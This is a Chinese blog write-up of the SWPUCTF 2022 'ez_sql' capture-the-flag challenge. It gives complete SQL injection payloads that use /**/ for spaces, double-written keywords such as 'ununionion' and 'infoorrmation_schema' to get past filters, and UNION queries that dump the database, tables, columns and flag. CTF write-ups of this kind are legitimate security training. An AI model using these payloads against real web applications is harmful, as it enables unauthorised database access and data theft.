[SWPUCTF-2022-新生赛]ez_sql

最新推荐文章于 2024-05-15 00:54:47 发布
最新推荐文章于 2024-05-15 00:54:47 发布
阅读量616 收藏 2
点赞数 8
分类专栏: CTF 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liaochonxiang/article/details/138166509
版权

title:[SWPUCTF 2022 新生赛]ez_sql

审题

image-20240424174236580

根据提示,POST传参

image-20240424174329686

得到假的flag

判断类型

image-20240424175218834

字符型注入

判断列数

image-20240424175251377

发现空格和’or’被过滤

重新构造

nss=-1'/**/oorrder/**/by/**/4#

image-20240424175529650

发现为3个字段

采用联合注入union

爆库

image-20240424175750382

发现union被过滤,双写union绕过

image-20240424180015437

发现没有显示我们需要的一页,切换页数

得到数据库: NSS_db

爆表

image-20240424180353945

发现information_schema被过滤,尝试双写

nss=-1'/**/ununionion/**/select/**/1,group_concat(table_name),database()/**/from/**/inforinformation_schemamation_schema.tables/**/where/**/table_schema=database()/**/limit/**/1,1%23

image-20240424181118655

发现并没有用还是过滤了’or’

双写绕过

nss=-1'/**/ununionion/**/select/**/1,group_concat(table_name),database()/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()/**/limit/**/1,1%23

image-20240424181234252

得到两个表: NSS_tb,users

显然users无用

爆字段

nss=-1'/**/ununionion/**/select/**/1,group_concat(column_name),database()/**/from/**/infoorrmation_schema.columns/**/where/**/table_name=' NSS_tb'/**/limit/**/1,1%23

image-20240424181559010

得到字段: id,Secr3t,flll444g

显然id没用

爆字段内容

nss=-1'/**/ununionion/**/select/**/1,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_db.NSS_tb/**/limit/**/1,1%23

image-20240424181921809
得到真正的flag: NSSCTF{e9e4d32b-8d81-4718-b0c7-54c3c29110f1}

liqingdi437
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NSSCTF-HUBUCTF新生-wp
F1rstb100d
09-21 1281
NSSCTF-HUBUCTF新生-wp
php upload ctf,强网杯CTF防御ez_upload Writeup
weixin_35645813的博客
03-17 1131
这是强网杯拟态防御线下遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家。ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型的ctf式题目(虽然现在大家都很抵制这样的题目),这里主要是分享Writeup以及我们队在完成题目时的思考流程。ez_upload 思考流程最开始我先描述一下题目逻辑。1、login.php,登陆页面,...
[SWPUCTF 2022 新生]ez_sql
m0_46056107的博客
11-25 380
参数为1的时候没有报错,为2和任何数的时候报,发现空格被过滤了,然后union需要双拼写。它的表有两个为,NSS_tb和users。查表的字段发现flag。数据库为NSS_db。
[UUCTF 2022 新生]ezsql
liaochonxiang的博客
04-28 486
反向前后过滤了相同的字符串:or,from,wehere。
[HUBUCTF 2022 新生]ezsql
最新发布
liaochonxiang的博客
05-15 380
发现密文以md5(password)形式存储在数据库中。users要换成十六进制0x7573657273。思路:更新资料的时候可以同时更新所有密码。我们需要知道密码的字段名。爆password字段。
SWPUCTF 2022新生 web部分wp
weixin_44770698的博客
01-16 4170
SWPUCTF 2022新生
EZ-USB-General-Purpose-Driver-Spec.rar_ez usb _ez-usb_purpose
09-20
EZ-USB通用驱动程序是USB设备开发中的一个重要组成部分,它为开发者提供了与USB设备交互的接口,使得设备能够顺利地在主机系统上运行。本文将深入探讨EZ-USB的通用驱动程序及其在USB驱动程序开发过程中的应用。 USB...
EZ-USBFX2.rar_ez usb _ez-usb_ez-usb fx2
09-21
"EZ-USB FX2.rar_ez usb _ez-usb_ez-usb fx2"这个标题可能是指一个包含EZ-USB FX2相关资料的压缩文件,包括驱动程序和可能的技术文档。 **EZ-USB FX2关键特性** 1. **集成USB控制器**: EZ-USB FX2内含一个全速USB ...
Anchor_EZ-Link_Cable.rar_Anchor_EZ-Link_Cable_anchor ez link_anc
09-21
【标题】"Anchor EZ-Link Cable.rar" 是一个关于 Anchor EZ-Link Cable 的驱动程序压缩包,其中包含了在Windows CE操作系统上使用该设备所需的驱动文件。"Anchor EZ-Link Cable" 是一种特殊的通信线缆,它允许用户在...
ADSP-BF533_EZ_KIT_Lite_Assembly.zip_ADSP-BF51_adsp-bf533_bf533
09-24
标题中的"ADSP-BF533_EZ_KIT_Lite_Assembly.zip_ADSP-BF51_adsp-bf533_bf533"指的是ADI公司的Blackfin系列数字信号处理器(DSP)的开发套件,特别是ADSP-BF533 EZ-KIT Lite的组装资料。该开发套件是针对ADSP-BF533和...
BUUCTF WEB Ezsqli
qq_41696858的博客
04-01 5556
继续刷题,comment之前在攻防世界刷过了,就不刷了。从题目上我们就知道这一题是个sql注入题 打开场景,我们发现依旧的儒雅随和 一个查询框,那么就是要硬搞了呗 经查询1,2是两条有效数字,0和其他的都是非法输入 1+1成功回显2,下面就是过滤字判断 既然是布尔型的回显,先试试0^1,嗯,异或符给我们留下了 布尔类型查用的substr,ascii先试试 0^(ascii(substr(‘hello’,1,1))>1) 1^(ascii(substr(‘hello’,1,1))>1) 成功回显,
[HUBUCTF 2022 新生]
zhhhb1005的博客
09-25 3259
这里卡在exp怎么写,后来详细了解了一下序列化和反序列化以后,再结合上面的isset( ),知道了username和password要用boolen类型,才写了出来。题目是想让我们做数学题,而且要速度介于1-3s之间,回答20个问题即可给出flag。函数 ,对于/a-zA-Z/这个正则表达式,我们可以利用PHP动态函数的特性,构造出字符串。先对代码进行审计,发现isset( )是我们没见过的用法,可以去了解一下。,$_GET['id']是通过get方法传过来的值。如果$_GET['id']没有被设置,则。
HUBUCTF 2022 新生-WEB部分wp
m0_74606212的博客
10-09 412
HUBUCTF 2022 新生-WEB部分wp
2022UUCTF-web
bossDDYY的博客
11-03 2013
我们先输入手机号和验证码试试,发现无论请求多少次 hint永远是895547922,结合mt_srand和mt_rand函数 当设置的种子确定(此处的种子时输入的手机号)时,每次的mt_rand都是固定的 我们可以猜测hint就是mt_rand的第一次,而目的验证码就是mt_rand的第二次。而且我们笃定是有上传的网页的,限制了文件类型 我们想要上传的是so,但是LD_PRELOAD也能解析jpg后缀 所以修改后缀上传就可以。sub的值是当前时间的最后一位,也就是保证当前的时间为xxxxxxxx1即可。
【CTF】[UUCTF 2022 新生]ez_upload
西原一点红的博客
06-19 948
Apache解析漏洞主要是因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准),可用来绕过黑名单过滤。webshell工具连接。flag 在/目录下。
[SWPUCTF 2021 新生]easy_sql
wyxlsm的博客
02-20 301
看库的表 使用函数 union_select 和 information_schema 的函数。我们可以简单看到 name:xxx password:yy 可能有数据库等你注入。这里 就看到提示你参数wllm 这边使用get 传参 让你输入点东西 可以。可以看出 使用函数 union_select 的命令 看出上限 在3。wllm =1' 可以看出字符串漏洞 去一步一步的开库。看到这个界面你直接打开F12或F11看源代码 看有什么提示。已经得出 查看flag值。
2022 UUCTF Web
weixin_63231007的博客
12-19 2564
2022UUCTF web部分题分析
NSSCTF-[SWPUCTF 2022]-web
J1ng_Hong的博客
11-14 738
ls发现根目录下有一个flag文件,然后用cat把他读取出来就行了。然后就得到了flag。
NSSCTF做题(10)
wwwwyyyrre的博客
10-19 491
叫10好听一点,就是补9的 第7页的内容。
sed -i -e 's/LS65_ACCT2/LS6_HIST2/g' \ -e 's/LS6_ACCT_WH/LS6_HIST_WH/g' \ -e 's/LS65_ACCT_YC/LS6_HIST_YC/g' \ -e 's/LS65_ACCT_EZ/LS6_HIST_EZ/g' \ -e 's/LS65_ACCT_SZ/LS6_HIST_SZ/g' \ -e 's/LS65_ACCT_XG/LS6_HIST_XG/g' \ -e 's/LS65_ACCT_SY/LS6_HIST_SY/g' \ -e 's/LS65_ACCT_XF/LS6_HIST_XF/g' \ -e 's/LS65_ACCT_ES/LS6_HIST_ES/g' \ -e 's/LS65_ACCT_SNJ/LS6_HIST_SNJ/g' \ -e 's/LS65_ACCT_JZ/LS6_HIST_JZ/g' \ -e 's/LS65_ACCT_HG/LS6_HIST_HG/g' \ -e 's/LS65_ACCT_XN/LS6_HIST_XN/g' \ -e 's/LS65_ACCT_JM/LS6_HIST_JM/g' \ -e 's/LS65_ACCT_HS/LS6_HIST_HS/g' \ -e 's/LS65_ACCT_XT/LS6_HIST_XT/g' \ -e 's/LS65_ACCT_TM/LS6_HIST_TM/g' \ -e 's/LS65_ACCT_QJ/LS6_HIST_QJ/g' \ -e 's/LS65_ACCTM_MVNO/LS6_HISTM_MVNO/g' \ -e 's/CREATE INDEX/CREATE \/\*+ parallel(4) \*\/ INDEX/g' \ -e 's/ LOCAL/&;/g' htxx202303_idx_create.sql
06-06
这段代码是一个 sed 命令,用于在 htxx202303_idx_create.sql 文件中进行多个字符串的替换和添加。其中 -i 选项表示直接修改文件内容,而不是输出到终端;-e 选项表示接下来的字符串是命令。具体操作为: - 将 LS65...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值